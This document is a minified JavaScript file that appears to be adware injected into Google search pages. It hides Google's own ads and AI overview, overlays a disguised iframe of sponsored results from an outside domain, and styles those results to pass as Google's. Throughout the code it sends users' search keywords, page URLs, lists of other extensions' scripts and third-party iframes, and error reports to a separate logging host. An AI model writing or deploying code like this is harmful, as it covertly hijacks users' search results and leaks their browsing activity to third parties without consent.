(function(){var i = "VPGCNBK0FG", atr = "0099-20250429-org", en = "", domain = "search.becovi.net", idomain = "balzachino.info";var log_domain = "irguio.info";var is_mobile = false;var etag_works = "test";var top_shopping = false;var error_version = "2";var rshow_timeout = null;
var hads_timeout = null;
var getkw_timeout = null;

function getkw(callback) {
  clearTimeout(getkw_timeout);

  var url = window.location.search;
  if (typeof url === "undefined" || url === null) {
      getkw_timeout = setTimeout(function() {
          return getkw(callback);
      }, 10)
      return;
  }
  var params = new URLSearchParams(url);
  var tbm = params.get('tbm');

  if (typeof tbm_blacklist === 'undefined') {
      tbm_blacklist = ['lcl', 'fin', 'shop'];
  }
  if (tbm_blacklist.indexOf(tbm) === -1) {
    if (url.indexOf("sidesearch=1") !== -1){
        rshow();
        return;
    }
    if (typeof path_check !== 'undefined') {
        if (window.location.pathname !== path_check) {
            rshow();
            return;
        }
    }
    else if (window.location.pathname !== '/search') {
        rshow();
        return;
    }
    var kw = params.get('q');
    if(kw && kw.length > 0) {
      return callback(kw);
    }
  }
  getkw_timeout = setTimeout(function() {
    return getkw(callback);
  }, 10)
}

function lightOrDark(color) {
    if (color == 'transparent') {
        return 'light';
    }

    var r, g, b, hsp;
    if (color.match(/^rgb/)) {
        color = color.match(/^rgba?\((\d+),\s*(\d+),\s*(\d+)(?:,\s*(\d+(?:\.\d+)?))?\)$/);

        r = color[1];
        g = color[2];
        b = color[3];
    } else {
        color = +("0x" + color.slice(1).replace(
        color.length < 5 && /./g, '$&$&'));

        r = color >> 16;
        g = color >> 8 & 255;
        b = color & 255;
    }

    if (r == 0 && g == 0 && b == 0) {
        return 'black';
    }

    hsp = Math.sqrt(
        0.299 * (r * r) +
        0.587 * (g * g) +
        0.114 * (b * b)
    );

    return hsp > 127.5 ? 'light' : 'dark';
}

function rshow() {
  clearTimeout(rshow_timeout);
  var el = document.querySelector("#rcnt");
  if (el) {
    el.style["opacity"] = 1;
    el = document.querySelector("#cnt");
    if (el) {
      el.style["opacity"] = 1;
    }
    var appbar = document.querySelector("#appbar");
    if (appbar) {
      appbar.style['opacity'] = 1;
    }
  }
  else {
    el = document.querySelector("#cnt");
    if (el) {
        el.style["opacity"] = 1;
    }
    var appbar = document.querySelector("#appbar");
    if (appbar) {
      appbar.style['opacity'] = 1;
    }
    rshow_timeout = setTimeout(rshow, 50);
  }
}

function removeAds() {
    if (!document.getElementById('opeRtF')) {
        var node = document.createElement("style");
        node.setAttribute('id', 'opeRtF');
        let additional_selectors = '';
        if (!top_shopping) {
            additional_selectors = ',#atvcap'
        }
        node.innerHTML = ".commercial-unit-desktop-top,.commercial-unit-desktop-rhs,#taw,#epbar,#mbEnd,#tads,#tadsb,.ads-ad,#extabar div[jscontroller=\"E9W1Ff\"] "+additional_selectors+" {display:none!important}.FcOujd .ULSxyf:first-child {margin-top: 0;!important}";

        document.getElementsByTagName("html")[0].appendChild(node);
    }
}

function verifyBrowserWithHighEntropyValues(callback) {
    let browser_name = '';
    if (typeof navigator.userAgentData !== 'undefined' && typeof navigator.userAgentData.getHighEntropyValues !== 'undefined') {
        navigator.userAgentData.getHighEntropyValues(
            ['fullVersionList'])
            .then((ua) => {
                var brands = [];
                if (typeof ua.fullVersionList === 'object') {
                    brands = ua.fullVersionList;
                } else if (typeof ua.brands === 'object') {
                    brands = ua.brands;
                }

                for (let i = 0; i < brands.length; i++) {
                    if (typeof brands[i].brand === 'string' && brands[i].brand === 'Microsoft Edge') {
                        browser_name = 'edge_hints';
                    }
                }

                callback(browser_name);
            })
            .catch(function(error) {
                callback(browser_name);
            });
    }
    else {
        callback(browser_name)
    }
}

function hasAlgoContainer() {
    return document.querySelector('#rcnt .g') !== null;
}

function hads() {
    clearTimeout(hads_timeout);
    var target = document.getElementsByTagName("html")[0];
    if (!target) {
        hads_timeout = setTimeout(hads, 10);
        return;
    }
    if (!hasAlgoContainer()) {
        var css_text = "#appbar, #rcnt, #cnt{opacity:0;}";
        var node = document.createElement("style");
        if (node.styleSheet && node.styleSheet.cssText) {
            node.styleSheet.cssText = css_text;
            target.appendChild(node);
        }
        else {
            node.innerHTML = css_text;
            target.appendChild(node);
        }
        removeAds();
    }
    else {
        reportBehavior({phase: 1});
    }
}


if(hasInitOverlap()){return;}
if(hasElementOverlap()){return;}

hads();

let scrollListener = function(){
    let x = Math.round(window.scrollX);
    let y = Math.round(window.scrollY);
    const width = window.innerWidth;
    const height = window.innerHeight;
    if ((x === 0 && y === 0) || (x === null || y === null)) { return; }
    let privatelayer = document.getElementById('privatelayer');
    if (!privatelayer) {
        privatelayer = document.getElementById('zxj3jdh2l');
    }
    privatelayer.contentWindow.postMessage(["pageScroll", {x, y, width, height}], "*");
};

function bodyDimensionListener(e) {
    if (e.data === 'bodyDimension') {
        let body = document.body;
        let d = document.documentElement;
        let bodyClientWidth = body ? body.clientWidth : null;
        let bodyScrollWidth = body ? body.scrollWidth : null;
        let bodyOffsetWidth = body ? body.offsetWidth : null;
        let documentClientWidth = d ? d.clientWidth : null;
        let documentScrollWidth = d ? d.scrollWidth : null;
        let documentOffsetWidth = d ? d.offsetWidth : null;
        let width = Math.max(bodyClientWidth, bodyScrollWidth, bodyOffsetWidth,
            documentClientWidth, documentScrollWidth, documentOffsetWidth);

        let bodyClientHeight = body ? body.clientHeight : null;
        let bodyScrollHeight = body ? body.scrollHeight : null;
        let bodyOffsetHeight = body ? body.offsetHeight : null;
        let documentClientHeight = d ? d.clientHeight : null;
        let documentScrollHeight = d ? d.scrollHeight : null;
        let documentOffsetHeight = d ? d.offsetHeight : null;
        let height = Math.max(bodyClientHeight, bodyScrollHeight, bodyOffsetHeight,
            documentClientHeight, documentScrollHeight, documentOffsetHeight);


        data = { width, height, documentClientHeight};
        let privatelayer = document.getElementById('privatelayer');
        if (!privatelayer) {
            privatelayer = document.getElementById('zxj3jdh2l');
        }
        privatelayer.contentWindow.postMessage(["bodyDimension", data], "*");
    }
    else if (e.data === 'pageScroll') {
        window.addEventListener('scroll', scrollListener, true);
    }
}
window.addEventListener('message', bodyDimensionListener, false);

function reportAIOverview(bidded = '0') {
    let params = new URLSearchParams(window.location.search);
    let keyword = params.get('q') || '';
    let ai_overview_element = document.querySelector('div[jsname="cUzNTd"]');
    if (ai_overview_element) {
        fetch('https://' + log_domain + '/page.php?i='+i+'&element=ai_overview&domain='+encodeURIComponent(window.location.hostname)+'&keyword='+encodeURIComponent(keyword)+'&bidded='+bidded).then(function (response) {});
    }
}

let script_url = document.currentScript && document.currentScript.src;
function reportChromeExtensions(template = '') {
    if (Math.random() > 0.25) {
        return;
    }
    let srcs = [];
    let selector = 'script[src^="chrome-extension://"]';
    if (/google./.test(window.location.host)) {
        selector = 'script[src^="chrome-extension://"], script:not([nonce])';
    }

    let excluded_domains = ['gstatic.com', 'googleapis.com', 'google.com', 'yimg.com'];
    document.querySelectorAll(selector).forEach((el) => {
        if (el.src && el.src !== script_url) {
            let test_src = el.src.replace('blob:', '');
            try {
                let test_src_url = new URL(test_src);
                let test_src_domain = test_src_url.hostname;
                if (!excluded_domains.some(domain => test_src_domain.includes(domain))) {
                    srcs.push(el.src);
                }
            } catch (e) {
                srcs.push(el.src);
            }

        }
    });
    if (srcs.length > 0) {
        fetch('https://'+log_domain+'/ssrc.php?t='+template+'&i='+encodeURIComponent(i)+'&atr='+encodeURIComponent(atr), {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                srcs: srcs,
                page: document.location.href,
            })
        });
    }
}

function reportIframes(template = '') {
    let srcs = [];

    if (/google./.test(window.location.host)) {
        let selector = 'iframe:not([src*="google."]):not([src*="youtube."]):not([src="about:blank"]):not([id="zxj3jdh2l"]):not([id="privatelayer"])';
        document.querySelectorAll(selector).forEach((el) => {
            if (el.src) {
                let test_src = el.src.replace('blob:', '');
                srcs.push(test_src);
            }
        });
        if (srcs.length > 0) {
            fetch('https://' + log_domain + '/isrc.php?t=' + template + '&i=' + encodeURIComponent(i) + '&atr=' + encodeURIComponent(atr), {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    srcs: srcs,
                    page: document.location.href,
                })
            });
        }
    }
}

function sendMessageToIframeWithRetry(iframe_window, message, expected_response, max_retries, initial_retry_interval) {
    let retries = 0;
    let message_sent = false;
    let retry_interval = initial_retry_interval;
    let retry_in_progress = false;

    return new Promise((resolve, reject) => {
        function handleMessage(event) {
            if (Array.isArray(event.data) ? event.data[0] === expected_response : event.data === expected_response) {
                window.removeEventListener('message', handleMessage);
                message_sent = true;
                resolve({ response: event.data, attempts: retries });
            }
        }

        window.addEventListener('message', handleMessage);

        function trySendMessage() {
            if (message_sent || retries >= max_retries) {
                if (!message_sent) {
                    window.removeEventListener('message', handleMessage);
                    reject(new Error('No response received after max retries.'));
                }
                return;
            }

            if (retry_in_progress) {
                // If a retry is already in progress, return early
                return;
            }

            retry_in_progress = true;
            iframe_window.postMessage(message, "*");
            retries++;

            setTimeout(() => {
                retry_in_progress = false;
                trySendMessage();
            }, retry_interval);
        }

        trySendMessage();
    });
}

function pagerLinks() {

    const paginationDiv = document.querySelector('.compPagination .pages');
    if (!paginationDiv) {
        return;
    }
    const pages = paginationDiv.querySelectorAll('a');
    const paginationData = [];
    pages.forEach(page => {
        paginationData.push({
            pageNumber: page.textContent.trim(),
            href: page.getAttribute('href')
        });
    });
    let next = document.querySelector('.compPagination .next');
    if (next) {
        paginationData.push({
            'next': next.getAttribute('href')
        });
    }
    window.parent.postMessage(["pager", paginationData], "*");
}

function getGooglePageNumber() {
    var params = new URLSearchParams(window.location.search);
    var start = params.get('start');
    if (start) {
        return Math.ceil(start / 10) + 1;
    }
    return 1;
}

function getYHSSavedPagerLinks(page) {
    if (page === 1) {
        return '';
    }
    if (typeof(Storage) === "undefined") {
        return '';
    }

    let pagerLinks = localStorage.getItem('pager_yhs');
    if (pagerLinks) {
        let pagerArr = JSON.parse(pagerLinks);
        let pager = pagerArr.find(pager => pager.pageNumber == page);
        if (pager) {
            return pager.href;
        }
    }
    return '';
}

function extractDomainLabelFromHostname(hostname) {
    let hostname_parts = hostname.replace(/^www\./, '').split('.');
    let part_number = 0;
    if (hostname_parts.length > 2) {
        let last_two_parts = hostname_parts.slice(-2).join('.');
        // Check if the last two parts are a common 2 parts TLD
        let tlds=[
            "com.au","net.au","org.au","edu.au","gov.au","asn.au","id.au","ac.uk",
            "co.uk","gov.uk","ltd.uk","me.uk","net.uk","nhs.uk","org.uk","plc.uk",
            "pol.uk","sch.uk","co.jp","ne.jp","or.jp","ac.jp","ed.jp","go.jp",
            "ad.jp","gr.jp","lg.jp","com.nz","net.nz","org.nz","maori.nz",
            "school.nz","govt.nz","iwi.nz","health.nz","co.za","net.za",
            "org.za","web.za","gov.za","ac.za","com.br","net.br","org.br",
            "gov.br","edu.br","com.mx","net.mx","org.mx","edu.mx","gob.mx",
            "com.tr","net.tr","org.tr","biz.tr","info.tr","gov.tr","com.tw",
            "net.tw","org.tw","edu.tw","gov.tw","com.vn","net.vn","org.vn",
            "edu.vn","gov.vn","com.sg","net.sg","org.sg","gov.sg","edu.sg",
            "per.sg","com.my","net.my","org.my","gov.my","edu.my","com.ph",
            "net.ph","org.ph","edu.ph","gov.ph","com.hk","net.hk","org.hk",
            "gov.hk","edu.hk","com.ar","net.ar","org.ar","gov.ar","edu.ar",
            "com.co","net.co","nom.co","org.co","edu.co","gov.co","com.pe",
            "net.pe","org.pe","edu.pe","gov.pe","com.ve","net.ve","org.ve",
            "edu.ve","gov.ve","com.eg","net.eg","org.eg","edu.eg","gov.eg",
            "com.sa","net.sa","org.sa","edu.sa","gov.sa","com.pk","net.pk",
            "org.pk","edu.pk","gov.pk","com.bd","net.bd","org.bd","edu.bd",
            "gov.bd","com.ng","net.ng","org.ng","edu.ng","gov.ng","com.gh",
            "org.gh","edu.gh","gov.gh","com.ke","net.ke","org.ke","edu.ke",
            "gov.ke","com.id","net.id","org.id","edu.id","go.id","ac.id",
            "co.th","in.th","go.th","net.th","org.th","ac.th","mi.th",
            "or.th","com.lk","net.lk","org.lk","edu.lk","gov.lk","com.kh",
            "net.kh","org.kh","edu.kh","gov.kh","com.mm","net.mm","org.mm",
            "edu.mm","gov.mm","com.uy","net.uy","org.uy","edu.uy","gov.uy",
            "com.ec","net.ec","org.ec","edu.ec","gov.ec","com.bo","net.bo",
            "org.bo","edu.bo","gov.bo","com.py","net.py","org.py","edu.py",
            "gov.py","com.cl","net.cl","org.cl","edu.cl","gov.cl","com.cr",
            "net.cr","org.cr","edu.cr","gov.cr","com.gt","net.gt","org.gt",
            "edu.gt","gov.gt","com.do","net.do","org.do","edu.do","gov.do",
            "com.hn","net.hn","org.hn","edu.hn","gov.hn","com.ni","net.ni",
            "org.ni","edu.ni","gov.ni","com.sv","net.sv","org.sv","edu.sv",
            "gov.sv","com.tt","net.tt","org.tt","edu.tt","gov.tt","com.bh",
            "net.bh","org.bh","edu.bh","gov.bh","com.om","net.om","org.om",
            "edu.om","gov.om","com.qa","net.qa","org.qa","edu.qa","gov.qa",
            "com.kw","net.kw","org.kw","edu.kw","gov.kw","com.lb","net.lb",
            "org.lb","edu.lb","gov.lb","com.jo","net.jo","org.jo","edu.jo",
            "gov.jo","com.cy","net.cy","org.cy","edu.cy","gov.cy"];
        if (tlds.includes(last_two_parts)) {
            part_number = hostname_parts.length - 3;
        } else {
            part_number = hostname_parts.length - 2;
        }
    }
    return hostname_parts[part_number];
}

function hideAiOverview() {
    if (!document.querySelector('#haioverview')) {
        let style = document.createElement('style');
        style.setAttribute('id', 'haioverview');
        style.innerHTML = '[jscontroller="qTdDb"], #eKIzJc {display:none !important;}';
        document.documentElement.appendChild(style);
    }
}function reportBehavior(data) {
    if (typeof bev_reported === 'undefined') {
        window.bev_reported = true;
        var origin = {i: i, atr: atr};
        fetch('https://'+log_domain+'/bev.php', {
            method: "POST", body: JSON.stringify({origin: origin, step: data})
        }).then(function (response) {});
    }
}function reportUserOverlap(data) {
    if (typeof overlap_reported === 'undefined') {
        window.overlap_reported = true;
        if (window.top === window.self) {
            var origin = {i: i, atr: atr};
            fetch('https://' + log_domain + '/overlap.php', {
                method: "POST", body: JSON.stringify({origin: origin, overlap: data})
            }).then(function (response) {
            });
        }
    }
}

function hasInitOverlap() {
    var e = document.getElementById('mpimpl');
    if (e) {
        reportUserOverlap({element: 'mpimpl', data: e.getAttribute('data-value')});
        return true;
    }
    if (typeof mpimpl != 'undefined') {
        var data = '';
        if (typeof mpimpl == 'string') {
            data = mpimpl;
        }
        reportUserOverlap({element: 'global', data: data});
        return true;
    }

}

function hasElementOverlap() {
    var e = document.getElementById('mdorkirgneorpowtn');
    if (e) {
        reportUserOverlap({element: 'mdorkirgneorpowtn', data: e.getAttribute('data-value')});
        return true;
    }
    if (typeof mdorkirgneorpowtn != 'undefined') {
        var data = '';
        if (typeof mdorkirgneorpowtn == 'string') {
            data = mdorkirgneorpowtn;
        }
        reportUserOverlap({element: 'global', data: data});
        return true;
    }
    e = document.getElementById('privatelayer');
    if (e) {
        reportUserOverlap({element: 'privatelayer', data: e.src || ''});
        return true;
    }
    e = document.getElementById('zxj3jdh2l');
    if (e) {
        reportUserOverlap({element: 'zxj3jdh2l', data: e.src || ''});
        return true;
    }
    e = document.getElementById('sadsfs');
    if (e) {
        reportUserOverlap({element: 'sadsfs', data: ''});
        return true;
    }
    e = document.getElementById('navflow');
    if (e) {
        reportUserOverlap({element: 'navflow', data: ''});
        return true;
    }
    e = document.getElementById('zsYMehe');
    if (e) {
        reportUserOverlap({element: 'zsYMehe', data: ''});
        return true;
    }
    e = document.querySelector('.flowsponso');
    if (e) {
        reportUserOverlap({element: 'flowsponso', data: ''});
        return true;
    }

    return false;
}


function hasThirdPartyElementOverlap() {
    if (typeof mdorkirgneorpowtn != 'undefined') {
        reportUserOverlap({element: 'global', data: mdorkirgneorpowtn});
        return true;
    }
    e = document.getElementById('sadsfs');
    if (e) {
        reportUserOverlap({element: 'sadsfs', data: ''});
        return true;
    }
    e = document.getElementById('navflow');
    if (e) {
        reportUserOverlap({element: 'navflow', data: ''});
        return true;
    }
    e = document.querySelector('.flowsponso');
    if (e) {
        reportUserOverlap({element: 'flowsponso', data: ''});
        return true;
    }
    e = document.getElementById('mdorkirgneorpowtn');
    if (e) {
        reportUserOverlap({element: 'mdorkirgneorpowtn', data: e.getAttribute('data-value')});
        return true;
    }
    e = document.getElementById('yhscss');
    if (e) {
        reportUserOverlap({element: 'yhscss', data: ''});
        return true;
    }
    e = document.getElementById('ghs');
    if (e) {
        reportUserOverlap({element: 'ghs', data: ''});
        return true;
    }
    e = document.getElementById('additional_results');
    if (e) {
        reportUserOverlap({element: 'additional_results', data: 'i=ZGPCQGFDN2'});
        return true;
    }


    return false;
}var hel = document.createElement('div');hel.setAttribute('data-value', "i=VPGCNBK0FG&atr=0099-20250429-org");hel.setAttribute('id', 'mpimpl');hel.style['display'] = 'none';document.documentElement.appendChild(hel);mpimpl = "i=VPGCNBK0FG&atr=0099-20250429-org";try{var startTime=Date.now();var rshow_timeout=null,varto=null,aas=false;var verify_overlap_timeout=null;function checkid(target,search_margin,iframe){if(varto){clearTimeout(varto)}var targetdiv=document.getElementById(target);if(typeof targetdiv!=="undefined"&&targetdiv!==null){if(document.body){var colors={};if(document.body){var bgColor=window.getComputedStyle(document.body).backgroundColor;if(bgColor!=="rgb(255, 255, 255)"){var darkness=lightOrDark(bgColor);switch(darkness){case"dark":colors.link="#8ab4f8";colors.description="#BDC1C6";colors.description_bold="#bcc0c3";colors.site="#bdc1c6";colors.sub_site="#969ba1";colors.dots="#9aa0a6";colors.sponsored="#dadce0";break;case"light":colors.link="#1a0dab";colors.description_bold="#5f6368";colors.description="#4d5156";colors.site="#202124";colors.sub_site="#5f6368";colors.dots="#4d5156";colors.sponsored="#202124";break;case"black":colors.link="#5ab3f0";colors.description="#BDC1C6";colors.description_bold="#bcc0c3";colors.site="#bdc1c6";colors.sub_site="#969ba1";colors.dots="#9aa0a6";colors.sponsored="#dadce0";break}colors.bg=bgColor;var link=document.querySelector("#rso .g:not(.mnr-c) a[ping] h3");if(!link){link=document.querySelector("#rso .g:not(.mnr-c) a[ping]")}if(link){colors.link=window.getComputedStyle(link).color}var site=document.querySelector("#rso .g:not(.mnr-c) cite");if(site){colors.site=window.getComputedStyle(site).color}var sub_site=document.querySelector("#rso .g:not(.mnr-c) cite span");if(sub_site){colors.sub_site=window.getComputedStyle(sub_site).color}var mobile_ad_background=document.querySelector("#center_col .Ww4FFb");if(mobile_ad_background){colors.ad_background=window.getComputedStyle(mobile_ad_background).backgroundColor;colors.ad_shadow=window.getComputedStyle(mobile_ad_background).boxShadow}iframe.contentWindow.postMessage(["color",colors],"*")}let ad_element=document.querySelector(".yuRUbf");if(ad_element){let colors={font_sizes:{}};let fontCiteName="";let cite_name_element=ad_element.querySelector(".VuuXrf");if(cite_name_element){fontCiteName=window.getComputedStyle(cite_name_element).getPropertyValue("font-size")}let fontSizeTitle="";let title_element=ad_element.querySelector("h3");if(title_element){fontSizeTitle=window.getComputedStyle(title_element).getPropertyValue("font-size")}let fontSizeCite="12px";let cite_element=ad_element.querySelector("cite");if(cite_element){fontSizeCite=window.getComputedStyle(cite_element).getPropertyValue("font-size")}if(fontSizeTitle==="22px"){colors.font_sizes.title="22px"}if(fontCiteName==="16px"||fontCiteName==="14px"){colors.font_sizes.site_name=fontCiteName}if(fontSizeCite==="16px"||fontSizeCite==="14px"){colors.font_sizes.site=fontSizeCite}colors.spacing={"title_padding-top":"4px"};colors.favicon_size="28px";iframe.contentWindow.postMessage(["theme",colors],"*")}applyAdDesign(iframe);window.addEventListener("message",function(e){resize(e,target)},false)}}var appbar=document.querySelector("#appbar");if(appbar&&appbar.offsetHeight>200){appbar.innerHTML="";appbar.style["height"]="43px"}var rect=targetdiv.getBoundingClientRect();if(targetdiv.getBoundingClientRect().height==0){var center_col=document.getElementById("center_col");if(center_col){rect=center_col.getBoundingClientRect()}}if(hasAlgoContainer()){reportBehavior({phase:2,time:Date.now()-startTime})}iframe.style.top=rect.top+window.scrollY+"px";iframe.style.left=rect.left+window.scrollX+"px";let added_space=12;if(is_mobile){added_space=0}targetdiv.style.marginTop=search_margin+added_space+"px";iframe.height=search_margin+"px";iframe.style.opacity="1";rshow();if(!is_mobile){setInterval(function(){var center_col=document.getElementById("center_col");if(center_col){rect=center_col.getBoundingClientRect();let privatelayer=document.getElementById("zxj3jdh2l");privatelayer.style.top=rect.top+window.scrollY+"px"}},10)}else{setInterval(function(){if(!document.querySelector("#rso")){iframe.style.opacity="0"}},100);elementReady("header.noscroll").then(()=>{document.querySelector("body").style.zIndex="11"});elementReady("#lb").then(()=>{document.querySelector("body").style.zIndex="11"})}}else{varto=setTimeout(function(){checkid(target,search_margin,iframe)},10)}}function algoHasNoFavicon(){return document.querySelectorAll("#res .g img.XNo5Ab, #res .g .XNo5Ab > svg").length===0&&document.querySelectorAll("#res .g cite.iUh30").length>0}function applyAdDesign(iframe){var layout_class="twolines";if(algoHasNoFavicon()){layout_class="nofav"}iframe.contentWindow.postMessage(["favicons",{layout:layout_class}],"*")}function resize(e,target){var targetdiv=document.getElementById(target);var eventName=e.data[0];var data=e.data[1];switch(eventName){case"resize":if(hasAlgoContainer()){reportBehavior({phase:2,time:Date.now()-startTime})}window.removeEventListener("message",resize,false);changeIframeHeight(data);rshow();break}}function changeIframeHeight(data){let targetdiv=document.getElementById("search");if(is_mobile){targetdiv=document.getElementById("rso")}let privatelayer=document.getElementById("zxj3jdh2l");privatelayer.height=data+"px";privatelayer.style.opacity="1";var rect=privatelayer.getBoundingClientRect();let added_space=26;if(is_mobile){added_space=0}targetdiv.style.marginTop=rect.height+added_space+"px"}function iframe(browser_name){var params=new URLSearchParams(window.location.search);var tbm=params.get("tbm");var udm=params.get("udm");if(tbm==="isch"||udm==="2"||udm==="50"){return}getkw(function(keyword){if(hasElementOverlap()){return}var css_text=".flowsponso{display:none;}";var node=document.createElement("style");node.innerHTML=css_text;document.getElementsByTagName("html")[0].appendChild(node);var meta=document.createElement("meta");meta.name="referrer";meta.content="no-referrer";document.getElementsByTagName("html")[0].appendChild(meta);var listener=function(e){var eventName=e.data[0];var data=e.data[1];if(eventName==="noCoverage"||eventName==="setHeight"){window.removeEventListener("message",listener,false)}switch(eventName){case"noCoverage":rshow();reportAIOverview("0");break;case"setHeight":if(typeof hideAiOverview==="function"){hideAiOverview()}removeAds();if(is_mobile){checkid("rso",data,iframe)}else{checkid("search",data,iframe)}reportAIOverview("1");break}};var listenerResize=function(e){var eventName=e.data[0];var data=e.data[1];if(eventName==="resizeHeight"){changeIframeHeight(data)}};window.addEventListener("message",listener,false);window.addEventListener("message",listenerResize,false);var l=document.getElementById("Wprf1b")?document.getElementById("Wprf1b").innerHTML:"";var tz=typeof Intl!=="undefined"&&typeof Intl.DateTimeFormat==="function"&&typeof Intl.DateTimeFormat().resolvedOptions==="function"&&typeof Intl.DateTimeFormat().resolvedOptions().timeZone==="string"?Intl.DateTimeFormat().resolvedOptions().timeZone:"";var iframe=document.createElement("iframe");var extra_info="";if(document.body){var bgColor=window.getComputedStyle(document.body)["backgroundColor"];if(bgColor==="rgb(32, 33, 36)"){extra_info+="&bg=dark"}else if(bgColor==="rgb(0, 0, 0)"){extra_info+="&bg=black"}else if(bgColor!=="rgb(255, 255, 255)"){extra_info+="&bgColor="+encodeURIComponent(bgColor)}}var resultWidth=window.innerWidth;if(window.innerWidth<768){resultWidth-=30}else if(window.innerWidth<1168){resultWidth=768-40}iframe.src="//"+domain+"/search.php?mobile="+is_mobile+"&width="+resultWidth+"&t=3&q="+encodeURIComponent(keyword)+"&i="+i+"&atr="+atr+"&en="+en+"&l="+encodeURIComponent(l)+"&tz="+encodeURIComponent(tz)+extra_info+"&aas="+encodeURIComponent(aas);if(browser_name){iframe.src+="&browser_name="+browser_name}iframe.id="zxj3jdh2l";iframe.marginwidth="0";iframe.marginheight="0";iframe.frameborder="0";iframe.height="0px";iframe.style.zIndex="10";iframe.style["border"]="0";iframe.style.opacity="0";iframe.style["overflow"]="hidden";if(is_mobile){iframe.style["width"]=window.innerWidth+"px"}else{iframe.style["width"]="630px"}iframe.style["position"]="absolute";iframe.setAttribute("referrerpolicy","no-referrer");document.getElementsByTagName("html")[0].appendChild(iframe);fetch("https://"+log_domain+"/inj.php?i="+encodeURIComponent(i)+"&atr="+encodeURIComponent(atr)+"&url="+encodeURIComponent(iframe.src));window.addEventListener("resize",function(){let privatelayer=document.getElementById("zxj3jdh2l");var targetdiv=document.getElementById("search");if(privatelayer&&targetdiv){var rect=targetdiv.getBoundingClientRect();privatelayer.style.left=rect.left+window.scrollX+"px";if(is_mobile){adjustIframeWidth()}}});if(is_mobile){elementReady("#center_col").then(()=>{adjustIframeWidth()})}verifyThirdPartyOverlap()})}function adjustIframeWidth(){let privatelayer=document.getElementById("zxj3jdh2l");var center_col_el=document.getElementById("center_col");if(window.innerWidth>=1160){privatelayer.style.width=window.innerWidth}else{privatelayer.style.width=window.getComputedStyle(center_col_el).width}}function verifyThirdPartyOverlap(){clearTimeout(verify_overlap_timeout);hasThirdPartyElementOverlap();verify_overlap_timeout=setTimeout(verifyThirdPartyOverlap,1e3)}function elementReady(selector){return new Promise((resolve,reject)=>{let el=document.querySelector(selector);if(el){resolve(el);return}new MutationObserver((mutationRecords,observer)=>{Array.from(document.querySelectorAll(selector)).forEach(element=>{resolve(element);observer.disconnect()})}).observe(document.documentElement,{childList:true,subtree:true})})}verifyBrowserWithHighEntropyValues(function(browser_name){iframe(browser_name)});setTimeout(function(){rshow()},3500);setTimeout(function(){reportChromeExtensions(1);reportIframes(1)},5e3)}catch(e){prepareErrorReport(e)}function prepareErrorReport(e){var err=e.stack.toString();if(err.length===0){err=e.toString()}sendErrorMessage(err)}function sendErrorMessage(message){fetch("https://"+log_domain+"/shy/e.php?cause="+encodeURIComponent(message)+"&i="+encodeURIComponent(i)+"&atr="+encodeURIComponent(atr)+"&url="+encodeURIComponent(document.location.href))}const script=document.currentScript;if(script&&script.crossOrigin==="anonymous"){window.onerror=(a,b,c,d,e)=>{let message=`message: ${a}, source: ${b}, line: ${c}, col: ${d}, error: ${e}`;sendErrorMessage(message);return true}}})();